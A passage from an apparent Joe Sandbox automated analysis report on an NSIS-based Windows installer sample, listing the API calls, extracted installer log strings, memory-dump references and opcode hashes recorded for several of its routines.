                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                      • API String ID: 608394941-2746725676

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,KsUtilizeBuildings,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,KsUtilizeBuildings,KsUtilizeBuildings,00000000,00000000,KsUtilizeBuildings,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$KsUtilizeBuildings
                                                                                                                                                                                                                                                                                      • API String ID: 4286501637-2167018182

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph figure, entry block 40337f-403398; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,004279E0,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                      • String ID: (]C$... %d%%$pAB$yB
                                                                                                                                                                                                                                                                                      • API String ID: 651206458-3882596388
                                                                                                                                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph figure, entry block 404f9e-404fb1; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: <RM>$KsUtilizeBuildings$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                      • API String ID: 247603264-611231991

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                      • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                                                                                                                      Control-flow Graph
                                                                                                                                                                                                                                                                                      control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
